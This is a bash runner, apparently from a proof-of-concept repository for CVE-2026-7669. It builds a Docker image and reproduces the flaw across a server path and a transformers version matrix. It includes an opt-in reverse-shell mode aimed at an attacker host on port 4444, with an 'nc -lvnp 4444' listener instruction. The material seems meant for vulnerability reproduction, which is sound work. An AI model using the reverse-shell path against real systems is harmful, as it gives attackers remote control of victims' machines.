README.md
Rendering markdown...
#!/usr/bin/env bash
# CVE-2026-7669 PoC runner.
#
# Usage:
# ./run.sh Full PoC (preflight + 4 phases + ledger).
# ./run.sh --server Reproduce via TokenizerManager init path.
# ./run.sh --versions Test transformers 5.0..5.5 matrix.
# ./run.sh --revshell HOST Opt-in reverse shell to HOST:4444.
# ./run.sh --rebuild Force --no-cache rebuild.
# ./run.sh --copy-ledger PATH Run then copy ledger to PATH.
set -euo pipefail
IMAGE_TAG="cve-2026-7669"
SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
cd "$SCRIPT_DIR"
if ! command -v docker >/dev/null 2>&1; then
echo "ERROR: docker not found in PATH." >&2
exit 127
fi
if ! docker info >/dev/null 2>&1; then
echo "ERROR: docker daemon not running." >&2
exit 127
fi
build_image() {
echo "[*] Building $IMAGE_TAG ..."
if [[ "${REBUILD:-0}" == "1" ]]; then
docker build --no-cache -t "$IMAGE_TAG" . 2>&1 | tail -3
else
docker build -t "$IMAGE_TAG" . 2>&1 | tail -3
fi
echo
}
case "${1:-}" in
--help|-h)
sed -n '2,12p' "$0"
exit 0
;;
--rebuild)
export REBUILD=1
shift || true
build_image
docker run --rm "$IMAGE_TAG"
;;
--revshell)
if [[ -z "${2:-}" ]]; then
echo "Usage: ./run.sh --revshell <attacker-ip>" >&2
exit 1
fi
echo "Listener: nc -lvnp 4444 on the attacker host first."
build_image
docker run --rm -e ATTACKER_HOST="$2" -e ATTACKER_PORT=4444 "$IMAGE_TAG"
;;
--server)
build_image
docker run --rm --entrypoint bash "$IMAGE_TAG" -c \
"python3 setup_model.py && python3 test_server.py"
;;
--versions)
build_image
docker run --rm --entrypoint bash "$IMAGE_TAG" -c \
"python3 setup_model.py && python3 test_versions.py"
;;
--copy-ledger)
if [[ -z "${2:-}" ]]; then
echo "Usage: ./run.sh --copy-ledger <out-path>" >&2
exit 1
fi
out_path="$2"
build_image
cid="$(docker create "$IMAGE_TAG")"
docker start -ai "$cid" || true
docker cp "$cid:/tmp/poc_claim_ledger.json" "$out_path"
docker rm "$cid" >/dev/null
echo "[*] Ledger written to $out_path"
;;
"")
build_image
docker run --rm "$IMAGE_TAG"
;;
*)
echo "Unknown option: $1" >&2
sed -n '2,12p' "$0"
exit 2
;;
esac